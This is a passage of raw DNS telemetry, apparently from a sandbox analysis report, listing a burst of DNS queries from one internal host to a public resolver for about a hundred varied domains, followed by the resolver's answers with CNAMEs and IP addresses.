Mar 22, 2023 05:45:55.524887085 CET	192.168.2.5	8.8.8.8	0x5685	Standard query (0)	agitz.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.526334047 CET	192.168.2.5	8.8.8.8	0xa0b5	Standard query (0)	wolffkran.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.526453972 CET	192.168.2.5	8.8.8.8	0xd558	Standard query (0)	notis.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.533958912 CET	192.168.2.5	8.8.8.8	0x401f	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.535284042 CET	192.168.2.5	8.8.8.8	0x23cf	Standard query (0)	aiolos-sa.gr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.537108898 CET	192.168.2.5	8.8.8.8	0xd255	Standard query (0)	aba.org.eg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.538048029 CET	192.168.2.5	8.8.8.8	0xad51	Standard query (0)	softizer.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.538810015 CET	192.168.2.5	8.8.8.8	0x2abd	Standard query (0)	msl-lock.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.539457083 CET	192.168.2.5	8.8.8.8	0x2166	Standard query (0)	tabbles.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.540919065 CET	192.168.2.5	8.8.8.8	0xd6dc	Standard query (0)	sjbmw.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.542237043 CET	192.168.2.5	8.8.8.8	0x84a1	Standard query (0)	reproar.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.545053005 CET	192.168.2.5	8.8.8.8	0xcf1	Standard query (0)	komie.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.546437979 CET	192.168.2.5	8.8.8.8	0x3873	Standard query (0)	uhsa.edu.ag	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.550427914 CET	192.168.2.5	8.8.8.8	0x8db8	Standard query (0)	ruzee.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.551687002 CET	192.168.2.5	8.8.8.8	0xe79c	Standard query (0)	wolffkran.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.554913998 CET	192.168.2.5	8.8.8.8	0x392f	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.555433989 CET	192.168.2.5	8.8.8.8	0x404b	Standard query (0)	cubodown.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.558362961 CET	192.168.2.5	8.8.8.8	0xa034	Standard query (0)	from30ty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.559745073 CET	192.168.2.5	8.8.8.8	0x8c3b	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.579773903 CET	192.168.2.5	8.8.8.8	0x451e	Standard query (0)	semuk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.580957890 CET	192.168.2.5	8.8.8.8	0x41a8	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.583818913 CET	192.168.2.5	8.8.8.8	0x98d4	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.608537912 CET	192.168.2.5	8.8.8.8	0x6ec3	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.614640951 CET	192.168.2.5	8.8.8.8	0xcfd5	Standard query (0)	tozzhin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.617515087 CET	192.168.2.5	8.8.8.8	0x527a	Standard query (0)	sgk.home.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.623511076 CET	192.168.2.5	8.8.8.8	0xe9e4	Standard query (0)	fr-dat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.639300108 CET	192.168.2.5	8.8.8.8	0x33e3	Standard query (0)	avse.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.645878077 CET	192.168.2.5	8.8.8.8	0xb8cb	Standard query (0)	geecl.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.658387899 CET	192.168.2.5	8.8.8.8	0x625	Standard query (0)	kallman.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.658694983 CET	192.168.2.5	8.8.8.8	0xbc28	Standard query (0)	refintl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.687278986 CET	192.168.2.5	8.8.8.8	0xf140	Standard query (0)	sledsport.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.689063072 CET	192.168.2.5	8.8.8.8	0x7232	Standard query (0)	nrsi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.719521046 CET	192.168.2.5	8.8.8.8	0xc310	Standard query (0)	shanks.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.740189075 CET	192.168.2.5	8.8.8.8	0xdf02	Standard query (0)	kallman.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.741146088 CET	192.168.2.5	8.8.8.8	0x1b9a	Standard query (0)	coxkitchensandbaths.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.755702019 CET	192.168.2.5	8.8.8.8	0x1c	Standard query (0)	pccj.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.759718895 CET	192.168.2.5	8.8.8.8	0xeb9b	Standard query (0)	vvsteknik.dk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.838159084 CET	192.168.2.5	8.8.8.8	0x905b	Standard query (0)	any-s.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.838807106 CET	192.168.2.5	8.8.8.8	0xc2fb	Standard query (0)	pleszew.policja.gov.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.839667082 CET	192.168.2.5	8.8.8.8	0xa915	Standard query (0)	biurohera.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.851681948 CET	192.168.2.5	8.8.8.8	0x3194	Standard query (0)	semuk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.864794016 CET	192.168.2.5	8.8.8.8	0x5548	Standard query (0)	4locals.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.870074987 CET	192.168.2.5	8.8.8.8	0x5238	Standard query (0)	cjcagent.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.881371975 CET	192.168.2.5	8.8.8.8	0x5a4b	Standard query (0)	ccrsi.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.892676115 CET	192.168.2.5	8.8.8.8	0x29f3	Standard query (0)	e-kami.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.893740892 CET	192.168.2.5	8.8.8.8	0x4495	Standard query (0)	burstner.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.893934011 CET	192.168.2.5	8.8.8.8	0xd596	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.894294977 CET	192.168.2.5	8.8.8.8	0x81ee	Standard query (0)	shteeble.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.894781113 CET	192.168.2.5	8.8.8.8	0xa673	Standard query (0)	absblast.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.895203114 CET	192.168.2.5	8.8.8.8	0x8d80	Standard query (0)	anduran.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.899118900 CET	192.168.2.5	8.8.8.8	0x43b3	Standard query (0)	cpmteam.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.925957918 CET	192.168.2.5	8.8.8.8	0x5c88	Standard query (0)	mcseurope.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.926363945 CET	192.168.2.5	8.8.8.8	0xd390	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.926548004 CET	192.168.2.5	8.8.8.8	0xb04b	Standard query (0)	bosado.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.926609039 CET	192.168.2.5	8.8.8.8	0xfcc9	Standard query (0)	awal.ws	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.926716089 CET	192.168.2.5	8.8.8.8	0xb0ef	Standard query (0)	someikan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.926870108 CET	192.168.2.5	8.8.8.8	0xe8a4	Standard query (0)	revoldia.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.926908016 CET	192.168.2.5	8.8.8.8	0x6e2f	Standard query (0)	t-trust.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.927176952 CET	192.168.2.5	8.8.8.8	0x8f72	Standard query (0)	sanfotek.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.931684017 CET	192.168.2.5	8.8.8.8	0xd94	Standard query (0)	indonesiamedia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.942821026 CET	192.168.2.5	8.8.8.8	0x193b	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.972510099 CET	192.168.2.5	8.8.8.8	0xdc55	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.977197886 CET	192.168.2.5	8.8.8.8	0x9c24	Standard query (0)	rkengg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.015697002 CET	192.168.2.5	8.8.8.8	0x2276	Standard query (0)	fortknox.bm	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.026818991 CET	192.168.2.5	8.8.8.8	0xa5fa	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.037919998 CET	192.168.2.5	8.8.8.8	0xd868	Standard query (0)	wahw.com.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.064563036 CET	192.168.2.5	8.8.8.8	0xae60	Standard query (0)	plaske.ua	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.067502975 CET	192.168.2.5	8.8.8.8	0x450e	Standard query (0)	nme.co.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.081348896 CET	192.168.2.5	8.8.8.8	0x24ce	Standard query (0)	s5w.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.081348896 CET	192.168.2.5	8.8.8.8	0x7abe	Standard query (0)	ludomemo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.081573009 CET	192.168.2.5	8.8.8.8	0x5449	Standard query (0)	rappich.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.082040071 CET	192.168.2.5	8.8.8.8	0xa5a4	Standard query (0)	any-s.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.101392984 CET	192.168.2.5	8.8.8.8	0x9046	Standard query (0)	angework.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.141515970 CET	192.168.2.5	8.8.8.8	0xf5d4	Standard query (0)	mcseurope.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.142051935 CET	192.168.2.5	8.8.8.8	0x3d92	Standard query (0)	nts-web.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.147332907 CET	192.168.2.5	8.8.8.8	0xd879	Standard query (0)	oh28ya.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.161564112 CET	192.168.2.5	8.8.8.8	0xce3d	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.185296059 CET	192.168.2.5	8.8.8.8	0xc2de	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.192397118 CET	192.168.2.5	8.8.8.8	0x1253	Standard query (0)	t-trust.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.208477974 CET	192.168.2.5	8.8.8.8	0xe59f	Standard query (0)	fogra.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.208787918 CET	192.168.2.5	8.8.8.8	0x95bd	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.224509954 CET	192.168.2.5	8.8.8.8	0x609d	Standard query (0)	dhh.la.gov	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.240730047 CET	192.168.2.5	8.8.8.8	0x8e90	Standard query (0)	lyto.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.256534100 CET	192.168.2.5	8.8.8.8	0xab16	Standard query (0)	valselit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.283288002 CET	192.168.2.5	8.8.8.8	0x6f9	Standard query (0)	uster.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.317837954 CET	192.168.2.5	8.8.8.8	0x4154	Standard query (0)	flamingorecordings.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.348881006 CET	192.168.2.5	8.8.8.8	0x96f5	Standard query (0)	jsaps.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.381925106 CET	192.168.2.5	8.8.8.8	0xad92	Standard query (0)	nlcv.bas.bg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.412197113 CET	192.168.2.5	8.8.8.8	0x4824	Standard query (0)	strazynski.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.424192905 CET	192.168.2.5	8.8.8.8	0x2848	Standard query (0)	jabian.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.427887917 CET	192.168.2.5	8.8.8.8	0xb410	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.432751894 CET	192.168.2.5	8.8.8.8	0x1e6a	Standard query (0)	forbin.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.439450979 CET	192.168.2.5	8.8.8.8	0x6828	Standard query (0)	websy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.444699049 CET	192.168.2.5	8.8.8.8	0x9776	Standard query (0)	wanoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.451853991 CET	192.168.2.5	8.8.8.8	0xf4d8	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.475382090 CET	192.168.2.5	8.8.8.8	0x72b	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.528743029 CET	192.168.2.5	8.8.8.8	0xc90f	Standard query (0)	muhr-soehne.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.530036926 CET	192.168.2.5	8.8.8.8	0x54a9	Standard query (0)	cqdgroup.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.540128946 CET	192.168.2.5	8.8.8.8	0x4efe	Standard query (0)	xsui.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.560765028 CET	192.168.2.5	8.8.8.8	0x8dce	Standard query (0)	ldh.la.gov	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.589590073 CET	192.168.2.5	8.8.8.8	0x592f	Standard query (0)	jnf.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.596828938 CET	192.168.2.5	8.8.8.8	0x3135	Standard query (0)	univi.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.604736090 CET	192.168.2.5	8.8.8.8	0x34d6	Standard query (0)	top1oil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.619925976 CET	192.168.2.5	8.8.8.8	0x88b4	Standard query (0)	mijash3.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.622385025 CET	192.168.2.5	8.8.8.8	0x3c7a	Standard query (0)	dbnet.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.628211021 CET	192.168.2.5	8.8.8.8	0xefbb	Standard query (0)	www.muhr-soehne.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.631015062 CET	192.168.2.5	8.8.8.8	0xf4df	Standard query (0)	bosado.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.640075922 CET	192.168.2.5	8.8.8.8	0xd522	Standard query (0)	fogra.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.674989939 CET	192.168.2.5	8.8.8.8	0x4163	Standard query (0)	karmy.com.pl	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 22, 2023 05:43:07.960979939 CET	8.8.8.8	192.168.2.5	0xca67	No error (0)	www.olras.com		80.93.82.33	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.965894938 CET	8.8.8.8	192.168.2.5	0x4836	Name error (3)	www.wkhk.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.973515034 CET	8.8.8.8	192.168.2.5	0x9de1	No error (0)	www.quadlock.com	quadlock.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:07.973515034 CET	8.8.8.8	192.168.2.5	0x9de1	No error (0)	quadlock.com		70.39.251.249	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.981468916 CET	8.8.8.8	192.168.2.5	0x97b1	No error (0)	www.fnw.us	fnw.us		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:07.981468916 CET	8.8.8.8	192.168.2.5	0x97b1	No error (0)	fnw.us		137.118.26.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.983532906 CET	8.8.8.8	192.168.2.5	0x6411	No error (0)	www.dgmna.com	dgmna.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:07.983532906 CET	8.8.8.8	192.168.2.5	0x6411	No error (0)	dgmna.com		192.124.249.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.983673096 CET	8.8.8.8	192.168.2.5	0x3f9a	No error (0)	www.jenco.co.uk		172.67.208.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.983673096 CET	8.8.8.8	192.168.2.5	0x3f9a	No error (0)	www.jenco.co.uk		104.21.23.9	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:07.986581087 CET	8.8.8.8	192.168.2.5	0x8a1a	Server failure (2)	www.ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.075331926 CET	8.8.8.8	192.168.2.5	0xdf3c	No error (0)	www.pdqhomes.com	traff-2.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:08.075331926 CET	8.8.8.8	192.168.2.5	0xdf3c	No error (0)	traff-2.hugedomains.com	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:08.075331926 CET	8.8.8.8	192.168.2.5	0xdf3c	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.253.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.075331926 CET	8.8.8.8	192.168.2.5	0xdf3c	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.204.160	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.197843075 CET	8.8.8.8	192.168.2.5	0x4d63	No error (0)	www.mqs.com.br	www.mqs.com.br.cdn.gocache.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:08.197843075 CET	8.8.8.8	192.168.2.5	0x4d63	No error (0)	www.mqs.com.br.cdn.gocache.net		170.82.173.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.197843075 CET	8.8.8.8	192.168.2.5	0x4d63	No error (0)	www.mqs.com.br.cdn.gocache.net		170.82.174.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.201308012 CET	8.8.8.8	192.168.2.5	0x270f	No error (0)	www.rs-ag.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.201308012 CET	8.8.8.8	192.168.2.5	0x270f	No error (0)	www.rs-ag.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.207735062 CET	8.8.8.8	192.168.2.5	0xeb12	No error (0)	www.pr-park.com		118.27.125.181	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.209048986 CET	8.8.8.8	192.168.2.5	0x6b5	No error (0)	www.baijaku.com	baijaku.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:08.209048986 CET	8.8.8.8	192.168.2.5	0x6b5	No error (0)	baijaku.com		59.106.19.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.518682957 CET	8.8.8.8	192.168.2.5	0xcc11	No error (0)	www.item-pr.com	item-pr.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:08.518682957 CET	8.8.8.8	192.168.2.5	0xcc11	No error (0)	item-pr.com		213.186.33.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.518682957 CET	8.8.8.8	192.168.2.5	0xcc11	No error (0)	item-pr.com		185.15.129.58	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.630990028 CET	8.8.8.8	192.168.2.5	0x2523	No error (0)	www.alteor.cl	gcdn0.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:08.630990028 CET	8.8.8.8	192.168.2.5	0x2523	No error (0)	gcdn0.wixdns.net	td-ccm-168-233.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:08.630990028 CET	8.8.8.8	192.168.2.5	0x2523	No error (0)	td-ccm-168-233.wixdns.net		34.117.168.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.635204077 CET	8.8.8.8	192.168.2.5	0x7923	No error (0)	www.valdal.com		172.67.73.176	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.635204077 CET	8.8.8.8	192.168.2.5	0x7923	No error (0)	www.valdal.com		104.26.6.221	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:08.635204077 CET	8.8.8.8	192.168.2.5	0x7923	No error (0)	www.valdal.com		104.26.7.221	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.039813995 CET	8.8.8.8	192.168.2.5	0x71c7	No error (0)	www.vazir.se		206.191.152.37	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.069420099 CET	8.8.8.8	192.168.2.5	0x62bb	No error (0)	www.depalo.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:09.069420099 CET	8.8.8.8	192.168.2.5	0x62bb	No error (0)	ghs.googlehosted.com		142.250.186.179	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.176588058 CET	8.8.8.8	192.168.2.5	0xca23	No error (0)	www.elpro.si		172.67.70.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.176588058 CET	8.8.8.8	192.168.2.5	0xca23	No error (0)	www.elpro.si		104.26.14.53	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.176588058 CET	8.8.8.8	192.168.2.5	0xca23	No error (0)	www.elpro.si		104.26.15.53	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.194433928 CET	8.8.8.8	192.168.2.5	0xf497	No error (0)	www.credo.edu.pl		62.122.190.121	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.204411983 CET	8.8.8.8	192.168.2.5	0xa754	No error (0)	www.nunomira.com	nunomira.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:09.204411983 CET	8.8.8.8	192.168.2.5	0xa754	No error (0)	nunomira.com		192.241.158.94	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.306082010 CET	8.8.8.8	192.168.2.5	0xfbfa	No error (0)	www.petsfan.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:09.306082010 CET	8.8.8.8	192.168.2.5	0xfbfa	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:09.306082010 CET	8.8.8.8	192.168.2.5	0xfbfa	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		52.71.57.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.306082010 CET	8.8.8.8	192.168.2.5	0xfbfa	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		54.209.32.212	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.317389965 CET	8.8.8.8	192.168.2.5	0xb62c	No error (0)	www.nelipak.nl		82.201.61.230	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:09.420892954 CET	8.8.8.8	192.168.2.5	0xed35	No error (0)	www.otena.com		99.83.154.118	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.103271961 CET	8.8.8.8	192.168.2.5	0x9358	No error (0)	www.transsib.com	www.studyrussian.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:10.103271961 CET	8.8.8.8	192.168.2.5	0x9358	No error (0)	www.studyrussian.com	studyrussian.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:10.103271961 CET	8.8.8.8	192.168.2.5	0x9358	No error (0)	studyrussian.com		80.74.154.6	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.106583118 CET	8.8.8.8	192.168.2.5	0xb2ba	Name error (3)	www.owsports.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.109081030 CET	8.8.8.8	192.168.2.5	0x86af	No error (0)	www.tvtools.fi		172.67.152.159	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.109081030 CET	8.8.8.8	192.168.2.5	0x86af	No error (0)	www.tvtools.fi		104.21.88.198	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.118983030 CET	8.8.8.8	192.168.2.5	0xf217	No error (0)	www.evcpa.com	evcpa.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:10.118983030 CET	8.8.8.8	192.168.2.5	0xf217	No error (0)	evcpa.com		192.124.249.10	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.135943890 CET	8.8.8.8	192.168.2.5	0xe873	No error (0)	www.edimart.hu		81.2.194.241	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.145575047 CET	8.8.8.8	192.168.2.5	0x4b86	No error (0)	www.t-tre.com		135.181.73.98	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.204384089 CET	8.8.8.8	192.168.2.5	0x5334	Name error (3)	www.jroy.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:10.764200926 CET	8.8.8.8	192.168.2.5	0x6cd6	No error (0)	www.abart.pl	abart.pl		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:10.764200926 CET	8.8.8.8	192.168.2.5	0x6cd6	No error (0)	abart.pl		89.161.163.246	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.076168060 CET	8.8.8.8	192.168.2.5	0x2384	No error (0)	www.hummer.hu	hummer.hu		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:11.076168060 CET	8.8.8.8	192.168.2.5	0x2384	No error (0)	hummer.hu		185.80.51.179	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.084949970 CET	8.8.8.8	192.168.2.5	0x34c6	No error (0)	www.xaicom.es	xaicom.es		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:11.084949970 CET	8.8.8.8	192.168.2.5	0x34c6	No error (0)	xaicom.es		188.165.133.163	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.085522890 CET	8.8.8.8	192.168.2.5	0x9a4e	No error (0)	www.naoi-a.com		202.254.236.40	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.087640047 CET	8.8.8.8	192.168.2.5	0xe3c3	No error (0)	www.vexcom.com		172.67.173.200	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.087640047 CET	8.8.8.8	192.168.2.5	0xe3c3	No error (0)	www.vexcom.com		104.21.55.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.121471882 CET	8.8.8.8	192.168.2.5	0xee27	No error (0)	www.pcgrate.com		172.67.201.26	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.121471882 CET	8.8.8.8	192.168.2.5	0xee27	No error (0)	www.pcgrate.com		104.21.66.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.185759068 CET	8.8.8.8	192.168.2.5	0xe716	No error (0)	www.abdg.com		192.252.154.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.210974932 CET	8.8.8.8	192.168.2.5	0xf397	No error (0)	www.cokocoko.com	traff-6.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
